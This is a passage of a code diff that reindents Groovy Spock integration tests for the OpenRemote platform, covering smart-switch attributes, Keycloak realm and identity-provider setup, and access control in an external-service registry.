-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{it.value}.orElse(0l) == fiveMinutesInFuture
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
-
-            }
-
+    then: "mode should be READY_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{
+        it.value
+      }.orElse(0l) == fiveMinutesInFuture
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/security/IdentityProviderTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/security/IdentityProviderTest.groovy
@@ -32,180 +32,181 @@ import spock.lang.Specification
 
 class IdentityProviderTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static ManagerKeycloakIdentityProvider identityProvider
+  @Shared
+  static ManagerKeycloakIdentityProvider identityProvider
 
-    def setupSpec() {
-        def container = startContainer(defaultConfig(), defaultServices())
-        identityProvider = container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider
-    }
+  def setupSpec() {
+    def container = startContainer(defaultConfig(), defaultServices())
+    identityProvider = container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider
+  }
 
-    def "Realm operations"() {
-        def realmName = "testrealm"
-        def realmDisplayName = "Test Realm"
-        def realmEnabled = true
+  def "Realm operations"() {
+    def realmName = "testrealm"
+    def realmDisplayName = "Test Realm"
+    def realmEnabled = true
 
-        when: "a realm does not yet exist in the identity provider"
-        !identityProvider.realmExists(realmName)
+    when: "a realm does not yet exist in the identity provider"
+    !identityProvider.realmExists(realmName)
 
-        and: "the realm is created"
-        def realm = new Realm(null, realmName, realmDisplayName, realmEnabled)
-        identityProvider.createRealm(realm)
-        realm = identityProvider.getRealm(realmName)
+    and: "the realm is created"
+    def realm = new Realm(null, realmName, realmDisplayName, realmEnabled)
+    identityProvider.createRealm(realm)
+    realm = identityProvider.getRealm(realmName)
 
-        then: "the realm exists in the identity provider"
-        identityProvider.realmExists(realmName)
+    then: "the realm exists in the identity provider"
+    identityProvider.realmExists(realmName)
 
-        and: "the realm has the correct properties"
-        realm.name == realmName
-        realm.displayName == realmDisplayName
-        realm.enabled == realmEnabled
+    and: "the realm has the correct properties"
+    realm.name == realmName
+    realm.displayName == realmDisplayName
+    realm.enabled == realmEnabled
 
-        when: "the realm is updated"
-        realmDisplayName = "Updated Test Realm"
-        realm.displayName = realmDisplayName
-        identityProvider.updateRealm(realm)
+    when: "the realm is updated"
+    realmDisplayName = "Updated Test Realm"
+    realm.displayName = realmDisplayName
+    identityProvider.updateRealm(realm)
 
-        then: "the realm still exists in the identity provider"
-        identityProvider.realmExists(realmName)
+    then: "the realm still exists in the identity provider"
+    identityProvider.realmExists(realmName)
 
-        when: "the realm is retrieved"
-        realm = identityProvider.getRealm(realmName)
+    when: "the realm is retrieved"
+    realm = identityProvider.getRealm(realmName)
 
-        then: "the realm has the correct properties"
-        realm.name == realmName
-        realm.displayName == realmDisplayName
-        realm.enabled == realmEnabled
+    then: "the realm has the correct properties"
+    realm.name == realmName
+    realm.displayName == realmDisplayName
+    realm.enabled == realmEnabled
 
-        when: "the realm is deleted"
-        identityProvider.deleteRealm(realmName)
+    when: "the realm is deleted"
+    identityProvider.deleteRealm(realmName)
 
-        then: "the realm no longer exists in the identity provider"
-        !identityProvider.realmExists(realmName)
+    then: "the realm no longer exists in the identity provider"
+    !identityProvider.realmExists(realmName)
 
-        and: "the realm cannot be retrieved"
-        identityProvider.getRealm(realmName) == null
-    }
+    and: "the realm cannot be retrieved"
+    identityProvider.getRealm(realmName) == null
+  }
 
-    def "Configure Keycloak chaining"() {
-        def realmName = Constants.MASTER_REALM
-        def idpAlias = "keycloak-oidc"
+  def "Configure Keycloak chaining"() {
+    def realmName = Constants.MASTER_REALM
+    def idpAlias = "keycloak-oidc"
 
-        when: "an identity provider is created in the realm"
-        Map<String, String> idpConfig = new HashMap<>();
-        idpConfig.put("clientId", "test-client");
-        idpConfig.put("clientSecret", "test-client-secret");
-        idpConfig.put("clientAuthMethod", "client_secret_basic");
-        idpConfig.put("syncMode", "FORCE");
-        idpConfig.put("filteredByClaim", "true");
-        idpConfig.put("claimFilterName", "claimName");
-        idpConfig.put("claimFilterValue", "claimValue");
-        identityProvider.createUpdateIdentityProvider(realmName, idpAlias, "oidc", "IdP Name", idpConfig);
+    when: "an identity provider is created in the realm"
+    Map<String, String> idpConfig = new HashMap<>()
+    idpConfig.put("clientId", "test-client")
+    idpConfig.put("clientSecret", "test-client-secret")
+    idpConfig.put("clientAuthMethod", "client_secret_basic")
+    idpConfig.put("syncMode", "FORCE")
+    idpConfig.put("filteredByClaim", "true")
+    idpConfig.put("claimFilterName", "claimName")
+    idpConfig.put("claimFilterValue", "claimValue")
+    identityProvider.createUpdateIdentityProvider(realmName, idpAlias, "oidc", "IdP Name", idpConfig)
 
-        then: "the identity provider is created in the realm"
-        identityProvider.getRealms { realmsResource ->
-            IdentityProvidersResource identityProvidersResource = realmsResource.realm(realmName).identityProviders();
-            def ipr = identityProvidersResource.findAll().stream().filter(ipr -> idpAlias == ipr.getAlias()).findFirst()
-            assert ipr.isPresent()
-            assert ipr.get().getProviderId() == "oidc"
-            assert ipr.get().getDisplayName() == "IdP Name"
-            return null
-        } == null
+    then: "the identity provider is created in the realm"
+    identityProvider.getRealms { realmsResource ->
+      IdentityProvidersResource identityProvidersResource = realmsResource.realm(realmName).identityProviders()
+      def ipr = identityProvidersResource.findAll().stream().filter(ipr -> idpAlias == ipr.getAlias()).findFirst()
+      assert ipr.isPresent()
+      assert ipr.get().getProviderId() == "oidc"
+      assert ipr.get().getDisplayName() == "IdP Name"
+      return null
+    } == null
 
-        and: "the identity provider configuration matches"
-        identityProvider.getRealms { realmsResource ->
-            IdentityProvidersResource identityProvidersResource = realmsResource.realm(realmName).identityProviders();
-            Map<String, String> storedConfig = identityProvidersResource.findAll().stream().filter(ipr -> idpAlias == ipr.getAlias()).findFirst().get().getConfig()
+    and: "the identity provider configuration matches"
+    identityProvider.getRealms { realmsResource ->
+      IdentityProvidersResource identityProvidersResource = realmsResource.realm(realmName).identityProviders()
+      Map<String, String> storedConfig = identityProvidersResource.findAll().stream().filter(ipr -> idpAlias == ipr.getAlias()).findFirst().get().getConfig()
 
-            assert idpConfig.size() == storedConfig.size()
-            idpConfig.each { key, value ->
-                if (key != "clientSecret") {
-                    // clientSecret is not returned by Keycloak for security reasons
-                    assert storedConfig.get(key) == value
-                }
-            }
+      assert idpConfig.size() == storedConfig.size()
+      idpConfig.each { key, value ->
+        if (key != "clientSecret") {
+          // clientSecret is not returned by Keycloak for security reasons
+          assert storedConfig.get(key) == value
+        }
+      }
 
-            return null
-        } == null
+      return null
+    } == null
 
-        when: "identity provider role mappers are created for all roles"
-        ClientRole.ALL_ROLES.forEach(role -> {
-            String mapperName = role.replaceAll(":", " ")
+    when: "identity provider role mappers are created for all roles"
+    ClientRole.ALL_ROLES.forEach(role -> {
+      String mapperName = role.replaceAll(":", " ")
 
-            Map<String, String> mapperConfig = new HashMap<>();
-            mapperConfig.put("syncMode", "FORCE")
-            mapperConfig.put("claim", "cloudRoles")
-            mapperConfig.put("claim.value", role)
-            mapperConfig.put("role", "openremote." + role)
+      Map<String, String> mapperConfig = new HashMap<>()
+      mapperConfig.put("syncMode", "FORCE")
+      mapperConfig.put("claim", "cloudRoles")
+      mapperConfig.put("claim.value", role)
+      mapperConfig.put("role", "openremote." + role)
 
-            identityProvider.createUpdateIdentityProviderMapper(realmName, idpAlias, mapperName, "oidc-role-idp-mapper", mapperConfig)
-        });
+      identityProvider.createUpdateIdentityProviderMapper(realmName, idpAlias, mapperName, "oidc-role-idp-mapper", mapperConfig)
+    })
 
-        then: "the identity provider role mappers are created"
-        identityProvider.getRealms { realmsResource ->
-            IdentityProviderResource idpResource = realmsResource.realm(realmName).identityProviders().get(idpAlias)
-            List<IdentityProviderMapperRepresentation> mappers = idpResource.getMappers()
+    then: "the identity provider role mappers are created"
+    identityProvider.getRealms { realmsResource ->
+      IdentityProviderResource idpResource = realmsResource.realm(realmName).identityProviders().get(idpAlias)
+      List<IdentityProviderMapperRepresentation> mappers = idpResource.getMappers()
 
-            assert mappers.size() == ClientRole.ALL_ROLES.size()
+      assert mappers.size() == ClientRole.ALL_ROLES.size()
 
-            mappers.each { mapper ->
-                Map<String, String> storedConfig = mapper.getConfig()
-                String role = storedConfig.get("claim.value")
+      mappers.each { mapper ->
+        Map<String, String> storedConfig = mapper.getConfig()
+        String role = storedConfig.get("claim.value")
 
-                assert ClientRole.ALL_ROLES.contains(role)
-                assert storedConfig.get("syncMode") == "FORCE"
-                assert storedConfig.get("claim") == "cloudRoles"
-                assert storedConfig.get("role") == "openremote." + role
-            }
+        assert ClientRole.ALL_ROLES.contains(role)
+        assert storedConfig.get("syncMode") == "FORCE"
+        assert storedConfig.get("claim") == "cloudRoles"
+        assert storedConfig.get("role") == "openremote." + role
+      }
 
-            return null
-        } == null
+      return null
+    } == null
 
-        when: "the browser authentication flow is configured to redirect to the identity provider"
-        identityProvider.addAuthenticationExecutionConfig(realmName, "browser", "identity-provider-redirector", idpAlias, Map.of("defaultProvider", idpAlias));
+    when: "the browser authentication flow is configured to redirect to the identity provider"
+    identityProvider.addAuthenticationExecutionConfig(realmName, "browser", "identity-provider-redirector", idpAlias, Map.of("defaultProvider", idpAlias))
 
-        then: "the authentication flow is updated"
-        identityProvider.getRealms { realmsResource ->
-            def flows = realmsResource.realm(realmName).flows().getFlows()
-            def browserFlow = flows.stream().filter { afr -> afr.getAlias() == "browser" }.findFirst().get()
-            def iprExecutions = browserFlow.getAuthenticationExecutions().stream().filter(execution -> execution.getAuthenticator() == "identity-provider-redirector").toList()
-            assert iprExecutions.size() == 1
-            assert iprExecutions.get(0).getAuthenticatorConfig() == idpAlias
-            return null
-        } == null
+    then: "the authentication flow is updated"
+    identityProvider.getRealms { realmsResource ->
+      def flows = realmsResource.realm(realmName).flows().getFlows()
+      def browserFlow = flows.stream().filter { afr ->
+        afr.getAlias() == "browser"
+      }.findFirst().get()
+      def iprExecutions = browserFlow.getAuthenticationExecutions().stream().filter(execution -> execution.getAuthenticator() == "identity-provider-redirector").toList()
+      assert iprExecutions.size() == 1
+      assert iprExecutions.get(0).getAuthenticatorConfig() == idpAlias
+      return null
+    } == null
 
-        when: "identity provider role mappers are modified for all roles"
-        ClientRole.ALL_ROLES.forEach(role -> {
-            String mapperName = role.replaceAll(":", " ")
+    when: "identity provider role mappers are modified for all roles"
+    ClientRole.ALL_ROLES.forEach(role -> {
+      String mapperName = role.replaceAll(":", " ")
 
-            Map<String, String> mapperConfig = new HashMap<>();
-            mapperConfig.put("syncMode", "INHERIT")
-            mapperConfig.put("claim", "cloudRoles")
-            mapperConfig.put("claim.value", role)
-            mapperConfig.put("role", "openremote." + role)
+      Map<String, String> mapperConfig = new HashMap<>()
+      mapperConfig.put("syncMode", "INHERIT")
+      mapperConfig.put("claim", "cloudRoles")
+      mapperConfig.put("claim.value", role)
+      mapperConfig.put("role", "openremote." + role)
 
-            identityProvider.createUpdateIdentityProviderMapper(realmName, idpAlias, mapperName, "oidc-role-idp-mapper", mapperConfig)
-        });
+      identityProvider.createUpdateIdentityProviderMapper(realmName, idpAlias, mapperName, "oidc-role-idp-mapper", mapperConfig)
+    })
 
-        then: "the identity provider role mappers are updated"
-        identityProvider.getRealms { realmsResource ->
-            IdentityProviderResource idpResource = realmsResource.realm(realmName).identityProviders().get(idpAlias)
-            List<IdentityProviderMapperRepresentation> mappers = idpResource.getMappers()
+    then: "the identity provider role mappers are updated"
+    identityProvider.getRealms { realmsResource ->
+      IdentityProviderResource idpResource = realmsResource.realm(realmName).identityProviders().get(idpAlias)
+      List<IdentityProviderMapperRepresentation> mappers = idpResource.getMappers()
 
-            assert mappers.size() == ClientRole.ALL_ROLES.size()
+      assert mappers.size() == ClientRole.ALL_ROLES.size()
 
-            mappers.each { mapper ->
-                Map<String, String> storedConfig = mapper.getConfig()
-                String role = storedConfig.get("claim.value")
+      mappers.each { mapper ->
+        Map<String, String> storedConfig = mapper.getConfig()
+        String role = storedConfig.get("claim.value")
 
-                assert ClientRole.ALL_ROLES.contains(role)
-                assert storedConfig.get("syncMode") == "INHERIT"
-                assert storedConfig.get("claim") == "cloudRoles"
-                assert storedConfig.get("role") == "openremote." + role
-            }
+        assert ClientRole.ALL_ROLES.contains(role)
+        assert storedConfig.get("syncMode") == "INHERIT"
+        assert storedConfig.get("claim") == "cloudRoles"
+        assert storedConfig.get("role") == "openremote." + role
+      }
 
-            return null
-        } == null
-    }
-
+      return null
+    } == null
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/services/ExternalServiceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/services/ExternalServiceTest.groovy
@@ -37,350 +37,349 @@ import static org.openremote.model.Constants.*
 
 class ExternalServiceTest extends Specification implements ManagerContainerTrait {
 
-    def "Test external service resource and local manager external service registry logic"() {
-
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def externalServiceRegistryService = container.getService(ExternalServiceRegistryService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        WebApplicationException ex
-
-
-        when: "the users are authenticated"
-        // regular user for non-service-user testing but with read:services scope
-        def regularUserAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        // building service user for single tenant logic
-        def buildingServiceUserAccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.getName(),
-                keycloakTestSetup.serviceUser.username,
-                keycloakTestSetup.serviceUser.secret
-        )
-
-        def buildingServiceUser2AccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.getName(),
-                keycloakTestSetup.serviceUser2.username,
-                keycloakTestSetup.serviceUser2.secret
-        )
-
-        // master service user for multi-tenant logic
-        def superServiceUserAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                keycloakTestSetup.superServiceUser.username,
-                keycloakTestSetup.superServiceUser.secret
-        )
-
-        then: "the users have been authenticated and the tokens are retrieved"
-        conditions.eventually {
-            assert buildingServiceUserAccessToken != null
-            assert regularUserAccessToken != null
-            assert superServiceUserAccessToken != null
-        }
-
-        when: "the external service resource is set up"
-        def serverUri = serverUri(serverPort)
-        def buildingExternalServiceResource = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.getName(), buildingServiceUserAccessToken).proxy(ExternalServiceResource)
-        def buildingExternalServiceResource2 = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.getName(), buildingServiceUser2AccessToken).proxy(ExternalServiceResource)
-        def regularUserExternalServiceResource = getClientApiTarget(serverUri, MASTER_REALM, regularUserAccessToken).proxy(ExternalServiceResource)
-        def superServiceUserExternalServiceResource = getClientApiTarget(serverUri, MASTER_REALM, superServiceUserAccessToken).proxy(ExternalServiceResource)
-
-        then: "the external service resources should be accessible"
-        assert buildingExternalServiceResource != null
-        assert regularUserExternalServiceResource != null
-        assert superServiceUserExternalServiceResource != null
-
-
-        // === Tests related to interacting with the external services resource as a service user for a specific realm ===
-
-        when: "the building service user registers an external service"
-        def buildingExternalService = new ExternalService(
-                serviceId: "building-energy-management",
-                label: "Building Energy Management Service",
-                homepageUrl: "https://local.test/services/building-energy-management/ui",
-                status: ExternalServiceStatus.AVAILABLE,
-        )
-        def registeredBuildingExternalService = buildingExternalServiceResource.registerService(null, buildingExternalService)
-
-        then: "the building external service should be registered and the registered external service should have an instanceId assigned"
-        assert registeredBuildingExternalService.instanceId != 0
-
-        and: "the building external service should be included in the list of external services for the building realm"
-        def buildingServices = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
-        assert buildingServices != null
-        assert buildingServices.size() == 1
-        assert buildingServices[0].serviceId == buildingExternalService.serviceId
-        assert buildingServices[0].label == buildingExternalService.label
-        assert buildingServices[0].realm == buildingExternalService.realm
-        assert buildingServices[0].homepageUrl == buildingExternalService.homepageUrl
-        assert buildingServices[0].status == buildingExternalService.status
-
-        when: "time advanced by 70 seconds, longer than the default registration lease duration"
-        advancePseudoClock(70, TimeUnit.SECONDS)
-
-        then: "the building external service should now be marked as unavailable"
-        externalServiceRegistryService.markExpiredInstancesAsUnavailable()
-        def buildingServiceAfterInstanceExpiry = buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-        assert buildingServiceAfterInstanceExpiry.status == ExternalServiceStatus.UNAVAILABLE
-
-        when: "the building service user sends a heartbeat"
-        buildingExternalServiceResource.heartbeat(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-
-        then: "the building external service should now be marked as available"
-        def buildingServiceAfterHeartbeat = buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-        assert buildingServiceAfterHeartbeat.status == ExternalServiceStatus.AVAILABLE
-        when: "another service user tries to send a heartbeat for the same external service"
-        buildingExternalServiceResource2.heartbeat(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-
-        then: "the heartbeat should be rejected, and a forbidden response received"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-        when: "another service user tries to de-register the same external service"
-        buildingExternalServiceResource2.deregisterService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-
-        then: "the de-registration should be rejected, and a forbidden response received"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-        when: "the building service user de-registers the external service"
-        buildingExternalServiceResource.deregisterService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-
-        then: "the building external service should no longer be included in the list of external services for the building realm"
-        def buildingServicesAfterDeregister = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
-        assert buildingServicesAfterDeregister != null
-        assert buildingServicesAfterDeregister.size() == 0
-
-        when: "the building service user tries to retrieve the now deregistered external service"
-        buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
-
-        then: "the building service user should receive a 404 not found response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.NOT_FOUND.getStatusCode()
-            return true
-        }
-
-        when: "the building service user tries to retrieve the external services from an inaccessible realm"
-        buildingExternalServiceResource.getServices(null, MASTER_REALM)
-
-        then: "the building service user should receive a 403 forbidden response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-        // === Tests related to global service registration and management ===
-
-        when: "the super user registers a global service (master realm + user is super user)"
-        def globalExternalService = new ExternalService(
-                serviceId: "forecasting-service",
-                label: "Forecasting Service",
-                homepageUrl: "https://local.test/services/forecasting-service/ui",
-                status: ExternalServiceStatus.AVAILABLE,
-        )
-        def registeredGlobalExternalService = superServiceUserExternalServiceResource.registerGlobalService(null, globalExternalService)
-
-        then: "the global external service should be registered and the registered external service should have an instanceId assigned"
-        assert registeredGlobalExternalService.instanceId != null
-
-        and: "the global external service should be included in the list of global services"
-        def globalServices = superServiceUserExternalServiceResource.getGlobalServices()
-        assert globalServices != null
-        assert globalServices.size() == 1
-        assert globalServices[0].serviceId == globalExternalService.serviceId
-
-        when: "time advanced by 70 seconds, longer than the default registration lease duration"
-        advancePseudoClock(70, TimeUnit.SECONDS)
-
-        then: "the global external service should now be marked as unavailable"
-        externalServiceRegistryService.markExpiredInstancesAsUnavailable()
-        def globalServiceAfterInstanceExpiry = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-        assert globalServiceAfterInstanceExpiry.status == ExternalServiceStatus.UNAVAILABLE
-
-        when: "the super user sends a heartbeat for the global external service"
-        superServiceUserExternalServiceResource.heartbeat(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-
-        then: "the global external service should now be marked as available"
-        def globalServiceAfterHeartbeat = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-        assert globalServiceAfterHeartbeat.status == ExternalServiceStatus.AVAILABLE
-
-
-        // === Tests related to interacting with global services as a service user from a realm different from the master realm ===
-
-        when: "the building service user tries to retrieve the global services"
-        def globalServicesForBuildingRealm = buildingExternalServiceResource.getGlobalServices()
-
-        then: "the building service user should receive the global services which includes the newly registered global forecasting service"
-        assert globalServicesForBuildingRealm != null
-        assert globalServicesForBuildingRealm.size() == 1
-        assert globalServicesForBuildingRealm[0].serviceId == registeredGlobalExternalService.serviceId
-
-        when: "the building service user registers a new realm-bound external service"
-        def buildingExternalService2 = new ExternalService(
-                serviceId: "building-energy-management-2",
-                label: "Building Energy Management Service 2",
-                homepageUrl: "https://local.test/services/building-energy-management-2/ui",
-                status: ExternalServiceStatus.AVAILABLE,
-        )
-        def registeredBuildingExternalService2 = buildingExternalServiceResource.registerService(null, buildingExternalService2)
-
-        then: "the building service user should receive the new realm-bound external service"
-        assert registeredBuildingExternalService2.instanceId != null
-
-        when: "the building service user retrieves the global external services"
-        def globalServicesForBuildingRealm2 = buildingExternalServiceResource.getGlobalServices()
-
-        then: "the returned global external services should only include the global forecasting service"
-        assert globalServicesForBuildingRealm2 != null
-        assert globalServicesForBuildingRealm2.size() == 1
-        assert globalServicesForBuildingRealm2[0].serviceId == registeredGlobalExternalService.serviceId
-
-        when: "the building service user retrieves external services from its realm"
-        def buildingServicesForBuildingRealm2 = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
-
-        then: "the returned external services should only include the new realm-bound external service"
-        assert buildingServicesForBuildingRealm2 != null
-        assert buildingServicesForBuildingRealm2.size() == 1
-        assert buildingServicesForBuildingRealm2[0].serviceId == buildingExternalService2.serviceId
-
-        when: "the building service user tries to send a heartbeat for the global external service"
-        buildingExternalServiceResource.heartbeat(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-
-        then: "the building service user should receive a 403 forbidden response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-        when: "the building service user tries to deregister the global external service"
-        buildingExternalServiceResource.deregisterService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-
-        then: "the building service user should receive a 403 forbidden response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-
-        // == Tests related to a regular user trying to interact with external services ===
-
-        when: "the regular user tries to retrieve the global external services"
-
-        def regularUserGlobalServices = regularUserExternalServiceResource.getGlobalServices()
-
-        then: "the regular user should receive a list of all global external services, since they are available to all realms"
-        assert regularUserGlobalServices != null
-        assert regularUserGlobalServices.size() == 1
-        assert regularUserGlobalServices[0].serviceId == registeredGlobalExternalService.serviceId
-
-        when: "the regular user tries to retrieve the external services from its realm"
-        def regularUserRealmServices = regularUserExternalServiceResource.getServices(null, MASTER_REALM)
-
-        then: "the regular user should receive a list of all external services from its realm"
-        assert regularUserRealmServices != null
-        assert regularUserRealmServices.size() == 1
-
-        when: "the regular user tries to retrieve the external services from a realm other than its own"
-        regularUserExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
-
-        then: "the regular user should receive a 403 forbidden response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.getStatusCode()
-            return true
-        }
-
-        when: "the regular user tries to send a heartbeat for an external service"
-        regularUserExternalServiceResource.heartbeat(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
-
-        then: "the regular user should receive a 401 unauthorized response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
-            return true
-        }
-
-        when: "the regular user tries to deregister an external service"
-        regularUserExternalServiceResource.deregisterService(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
-
-        then: "the regular user should receive a 401 unauthorized response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
-            return true
-        }
-
-        when: "the regular user tries to register an external service"
-        def regularUserNewService = new ExternalService(
-                serviceId: "regular-user-new-service",
-                label: "Regular User New Service",
-                homepageUrl: "https://local.test/services/regular-user-new-service/ui",
-                status: ExternalServiceStatus.AVAILABLE,
-        )
-        regularUserExternalServiceResource.registerService(null, regularUserNewService)
-
-        then: "the regular user should receive a 401 unauthorized response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
-            return true
-        }
-
-        when: "the regular user tries to register a global external service"
-        regularUserExternalServiceResource.registerGlobalService(null, regularUserNewService)
-
-        then: "the regular user should receive a 401 unauthorized response"
-        ex = thrown(WebApplicationException)
-        ex.response.withCloseable { r ->
-            assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
-            return true
-        }
-
-
-        // == Additional miscellaneous tests ==
-
-        when: "time advances by 70 seconds, longer than the default registration lease duration"
-        advancePseudoClock(70, TimeUnit.SECONDS)
-
-        then: "the global external service should now be marked as unavailable"
-        externalServiceRegistryService.markExpiredInstancesAsUnavailable()
-        def globalServiceAfterInstanceExpiryMisc = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
-        assert globalServiceAfterInstanceExpiryMisc.status == ExternalServiceStatus.UNAVAILABLE
-
-        and: "the building external service should now be marked as unavailable"
-        def buildingServiceAfterInstanceExpiryMisc = buildingExternalServiceResource.getService(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
-        assert buildingServiceAfterInstanceExpiryMisc.status == ExternalServiceStatus.UNAVAILABLE
-
-        when: "time advances by 24 hours, longer than the default automatic deregistration threshold"
-        advancePseudoClock(24, TimeUnit.HOURS)
-        externalServiceRegistryService.deregisterLongExpiredInstances()
-
-        then: "the building external service should now be deregistered, thus the list of external services for the building realm should be empty"
-        def buildingRealmServices = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
-        assert buildingRealmServices.size() == 0
-
-        and: "the global external service should now be deregistered, thus the list of global external services should be empty"
-        def globalRealmServices = buildingExternalServiceResource.getGlobalServices()
-        assert globalRealmServices.size() == 0
-
+  def "Test external service resource and local manager external service registry logic"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def externalServiceRegistryService = container.getService(ExternalServiceRegistryService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    WebApplicationException ex
+
+
+    when: "the users are authenticated"
+    // regular user for non-service-user testing but with read:services scope
+    def regularUserAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+
+    // building service user for single tenant logic
+    def buildingServiceUserAccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.getName(),
+            keycloakTestSetup.serviceUser.username,
+            keycloakTestSetup.serviceUser.secret
+            )
+
+    def buildingServiceUser2AccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.getName(),
